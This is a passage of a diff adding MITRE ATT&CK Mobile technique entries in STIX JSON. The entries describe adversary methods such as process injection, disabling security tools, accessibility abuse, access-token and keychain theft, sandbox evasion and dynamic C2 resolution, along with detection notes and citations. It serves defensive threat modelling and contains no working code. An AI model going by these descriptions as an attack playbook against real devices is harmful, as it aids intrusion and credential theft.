is masked under a legitimate process.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for misuse of dynamic libraries.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "created": "2022-03-30T19:05:17.048Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1631/001", + "external_id": "T1631.001" + }, + { + "source_name": "BH Linux Inject", + "description": "Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.", + "url": "https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf" + }, + { + "source_name": "Medium Ptrace JUL 2018", + "description": "Jain, S. (2018, July 25). Code injection in running process using ptrace. Retrieved February 21, 2020.", + "url": "https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be" + }, + { + "source_name": "PTRACE man", + "description": "Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. Retrieved February 21, 2020.", + "url": "http://man7.org/linux/man-pages/man2/ptrace.2.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:59:55.849Z", + "name": "Impair Defenses", + "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may span both native defenses as well as supplemental capabilities installed by users or mobile endpoint administrators.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products integrated with Samsung Knox for Mobile Threat Defense can monitor processes to see if security tools are killed or stop running. Application vetting can detect many techniques associated with impairing device defenses.(Citation: Samsung Knox Mobile Threat Defense)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "created": "2022-04-01T18:42:22.117Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1629", + "external_id": "T1629" + }, + { + "source_name": "Samsung Knox Mobile Threat Defense", + "description": "Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. Retrieved March 30, 2022.", + "url": "https://partner.samsungknox.com/mtd" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "external_id": "APP-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Lukáš Štefanko, ESET" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--2204c371-6100-4ae0-82f3-25c07c29772a", + "type": "attack-pattern", + "created": "2017-10-25T14:48:08.613Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "external_id": "T1453", + "url": "https://attack.mitre.org/techniques/T1453" + }, + { + "url": "https://www.skycure.com/blog/accessibility-clickjacking/", + "description": "Yair Amit. (2016, March 3). “Accessibility Clickjacking” – The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved December 21, 2016.", + "source_name": "Skycure-Accessibility" + }, + { + "description": "Lukáš Štefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019.", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/", + "source_name": "android-trojan-steals-paypal-2fa" + }, + { + "source_name": "banking-trojans-google-play", + "url": "https://www.welivesecurity.com/2018/10/24/banking-trojans-continue-surface-google-play/", + "description": "Lukáš Štefanko. (2018, October 24). Banking Trojans continue to surface on Google Play. Retrieved July 11, 2019." + } + ], + "modified": "2020-03-30T14:03:43.761Z", + "name": "Abuse Accessibility Features", + "description": "**This technique has been deprecated. Please use [Input Capture](https://attack.mitre.org/techniques/T1417), [Input Injection](https://attack.mitre.org/techniques/T1516), and [Input Prompt](https://attack.mitre.org/techniques/T1411) where appropriate.**\n\nA malicious app could abuse Android's accessibility features to capture sensitive data or perform other malicious actions.(Citation: Skycure-Accessibility)\n\nAdversaries may abuse accessibility features on Android to emulate a user's clicks, for example to steal money from a user's bank account.(Citation: android-trojan-steals-paypal-2fa)(Citation: banking-trojans-google-play)\n\nAdversaries may abuse accessibility features on Android devices to evade defenses by repeatedly clicking the \"Back\" button when a targeted app manager or mobile security app is launched, or when strings suggesting uninstallation are detected in the foreground. This effectively prevents the malicious application from being uninstalled.(Citation: android-trojan-steals-paypal-2fa)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": true, + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:51:07.651Z", + "name": "Exploitation of Remote Services", + "description": "Adversaries may exploit remote services of enterprise servers, workstations, or other resources to gain unauthorized access to internal systems once inside of a network. Adversaries may exploit remote services by taking advantage of a mobile device’s access to an internal enterprise network through local connectivity or through a Virtual Private Network (VPN). Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. \n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1423) or other Discovery methods. These look for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nDepending on the permissions level of the vulnerable remote service, an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1404) as a result of lateral movement exploitation as well. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting software exploitation initiated by a mobile device may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash.\n\nNetwork traffic analysis could reveal patterns of compromise if devices attempt to access unusual targets or resources. \n\nApplication vetting may be able to identify applications that perform Discovery or utilize existing connectivity to remotely access hosts within an internal enterprise network. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d", + "created": "2017-10-25T14:48:13.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1428", + "external_id": "T1428" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-32.html", + "external_id": "APP-32" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "created": "2022-04-01T19:06:27.177Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1437.001", + "url": "https://attack.mitre.org/techniques/T1437/001" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-29" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may communicate using application layer protocols associated with web protocols traffic to avoid detection/network filtering by blending in with existing traffic. Commands to remote mobile devices, and often the results of those commands, will be embedded within the protocol traffic between the mobile client and server. \n\nWeb protocols such as HTTP and HTTPS are used for web traffic as well as well as notification services native to mobile messaging services such as Google Cloud Messaging (GCM) and newly, Firebase Cloud Messaging (FCM), (GCM/FCM: two-way communication) and Apple Push Notification Service (APNS; one-way server-to-device). Such notification services leverage HTTP/S via the respective API and are commonly abused on Android and iOS respectively in order blend in with routine device traffic making it difficult for enterprises to inspect. ", + "modified": "2022-04-06T13:07:45.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Web Protocols", + "x_mitre_detection": "Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior. ", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:53:52.292Z", + "name": "Steal Application Access Token", + "description": "Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering or URI hijacking and typically requires user action to grant access, such as through a system “Open With” dialogue. \n\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework used to issue tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry through OAuth 2.0 using a variety of authorization protocols. An example of a commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested without requiring user credentials.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users may be presented with a popup to select the appropriate application to open a URI in. If the user sees an application they do not recognize, they can remove it. When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "created": "2022-04-01T15:12:50.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1635", + "external_id": "T1635" + }, + { + "source_name": "Android-AppLinks", + "description": "Android. (n.d.). Handling App Links. Retrieved December 21, 2016.", + "url": "https://developer.android.com/training/app-links/index.html" + }, + { + "source_name": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019", + "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.", + "url": "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/" + }, + { + "source_name": "Microsoft - OAuth Code Authorization flow - June 2019", + "description": "Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow" + }, + { + "source_name": "Microsoft Identity Platform Protocols May 2019", + "description": "Microsoft. (n.d.). Retrieved September 12, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols" + }, + { + "source_name": "IETF-OAuthNativeApps", + "description": "W. Denniss and J. Bradley. (2017, October). IETF RFC 8252: OAuth 2.0 for Native Apps. Retrieved November 30, 2018.", + "url": "https://tools.ietf.org/html/rfc8252" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "created": "2022-04-11T20:05:56.069Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1628.002", + "url": "https://attack.mitre.org/techniques/T1628/002" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device. \n\nWhile there are many ways this can be accomplished, one method is by using the device’s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.", + "modified": "2022-04-11T20:05:56.069Z", + "name": "User Evasion", + "x_mitre_detection": "Mobile security products may be able to detect some forms of user evasion. Otherwise, the act of hiding malicious activity could be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "defense-evasion", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:37:57.884Z", + "name": "Virtualization/Sandbox Evasion", + "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors after checking for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware’s behavior to disengage from the victim or conceal the core functions of the payload. They may also search for VME artifacts before dropping further payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) during automated discovery to shape follow-on behaviors. \n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) such as checking for system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for applications attempting to get `android.os.SystemProperties` or `getprop` with the runtime `exec()` commands. This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f", + "created": "2022-03-30T17:51:29.550Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1633", + "external_id": "T1633" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--27f483c6-6666-44fa-8532-ffd5fc7dab38", + "created": "2020-06-24T17:33:49.778Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1579", + "url": "https://attack.mitre.org/techniques/T1579" + }, + { + "source_name": "Apple Keychain Services", + "url": "https://developer.apple.com/documentation/security/keychain_services", + "description": "Apple, Inc.. (n.d.). Keychain Services. Retrieved June 24, 2020." + }, + { + "source_name": "Elcomsoft Decrypt Keychain", + "url": "https://blog.elcomsoft.com/2018/12/six-ways-to-decrypt-iphone-passwords-from-the-keychain/", + "description": "V. Katalov. (2018, December 18). Six Ways to Decrypt iPhone Passwords from the Keychain. Retrieved June 24, 2020." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "AUT-11" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may collect the keychain storage data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials.\n\nOn the device, the keychain database is stored outside of application sandboxes to prevent unauthorized access to the raw data. Standard iOS APIs allow applications access to their own keychain contained within the database. By utilizing a privilege escalation exploit or existing root access, an adversary can access the entire encrypted database.(Citation: Apple Keychain Services)(Citation: Elcomsoft Decrypt Keychain)", + "modified": "2022-04-01T15:02:43.470Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Keychain", + "x_mitre_detection": "Mobile security products can potentially detect jailbroken devices and perform further actions as necessary.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--29e07491-8947-43a3-8d4e-9a787c45f3d3", + "created": "2017-10-25T14:48:17.176Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1413", + "url": "https://attack.mitre.org/techniques/T1413" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-3.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-3" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-13" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device's system log. On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.", + "modified": "2022-04-06T15:37:34.463Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Access Sensitive Data in Device Logs", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:16:19.547Z", + "name": "Command and Scripting Interpreter", + "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, Android is a UNIX-like OS and includes a basic [Unix Shell](https://attack.mitre.org/techniques/T1623/001) that can be accessed via the Android Debug Bridge (ADB) or Java’s `Runtime` package.\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0027) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Command-line activities can potentially be detected through Mobile Threat Defense integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\n\nApplication vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "created": "2022-03-30T13:40:37.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1623", + "external_id": "T1623" + }, + { + "source_name": "Samsung Knox Mobile Threat Defense", + "description": "Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. Retrieved March 30, 2022.", + "url": "https://partner.samsungknox.com/mtd" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:40:12.912Z", + "name": "Disable or Modify Tools", + "description": "Adversaries may disable security tools to avoid potential detection of their tools and activities. This can take the form of disabling security software, modifying SELinux configuration, or other methods to interfere with security tools scanning or reporting information. This is typically done by abusing device administrator permissions or using system exploits to gain root access to the device to modify protected system files.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view a list of active device administrators in the device settings.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "created": "2022-04-01T18:51:13.963Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1629/003", + "external_id": "T1629.003" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:43:44.687Z", + "name": "Ingress Tool Transfer", + "description": "Adversaries may transfer tools or other files from an external system onto a compromised device to facilitate follow-on actions. Files may be copied from an external adversary-controlled system through the command and control channel or through alternate protocols with another tool such as FTP.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for connections to unknown domains or IP addresses. Application vetting services may indicate precisely what content was requested during application execution.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "created": "2020-01-21T15:27:30.182Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1544", + "external_id": "T1544" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2ccc3d39-9598-4d32-9657-42e1c7095d26", + "created": "2022-04-05T19:57:15.734Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1637", + "url": "https://attack.mitre.org/techniques/T1637" + }, + { + "source_name": "Data Driven Security DGA", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. This algorithm can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.", + "modified": "2022-04-05T19:57:15.734Z", + "name": "Dynamic Resolution", + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different Domain Generation Algorithms (DGAs), constantly evolving malware families, and the increasing complexity of the algorithms. There are a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) Content delivery network (CDN) domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, a more general approach for detecting a suspicious domain is to check for recently registered names or rarely visited domains.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2d646840-f6f5-4619-a5a8-29c8316bbac5", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1477", + "url": "https://attack.mitre.org/techniques/T1477" + }, + { + "source_name": "Forbes-iPhoneSMS", + "url": "http://www.forbes.com/2009/07/28/hackers-iphone-apple-technology-security-hackers.html", + 